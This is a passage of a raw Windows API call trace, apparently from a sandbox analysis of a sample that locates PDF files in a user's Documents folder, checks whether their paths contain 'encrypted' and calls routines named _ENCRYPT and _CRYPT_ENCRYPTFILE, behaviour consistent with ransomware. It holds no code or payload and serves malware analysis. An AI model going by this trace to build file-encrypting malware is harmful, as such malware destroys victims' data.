lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.616] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.616] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.616] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.616] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.616] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.616] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.617] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.617] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.617] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b952d20, ftCreationTime.dwHighDateTime=0x1d5c04a, ftLastAccessTime.dwLowDateTime=0x545d4c30, ftLastAccessTime.dwHighDateTime=0x1d5c5e9, ftLastWriteTime.dwLowDateTime=0x545d4c30, ftLastWriteTime.dwHighDateTime=0x1d5c5e9, nFileSizeHigh=0x0, nFileSizeLow=0x17325, dwReserved0=0x0, dwReserved1=0x777648, cFileName="LCKIcVhsNU_6Z.pdf", cAlternateFileName="LCKICV~1.PDF")) returned 0x7c20c0 [0035.617] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.617] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b952d20, ftCreationTime.dwHighDateTime=0x1d5c04a, ftLastAccessTime.dwLowDateTime=0x545d4c30, ftLastAccessTime.dwHighDateTime=0x1d5c5e9, ftLastWriteTime.dwLowDateTime=0x545d4c30, ftLastWriteTime.dwHighDateTime=0x1d5c5e9, nFileSizeHigh=0x0, nFileSizeLow=0x17325, dwReserved0=0x0, dwReserved1=0x777648, cFileName="LCKIcVhsNU_6Z.pdf", cAlternateFileName="LCKICV~1.PDF")) returned 0x7c20c0 [0035.617] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.617] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rHG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HG4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BBW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BW8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LCKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CKIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KIcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IcVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cVhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VhsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hsNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sNU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NU_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U_6Z.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.620] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.620] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.620] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", 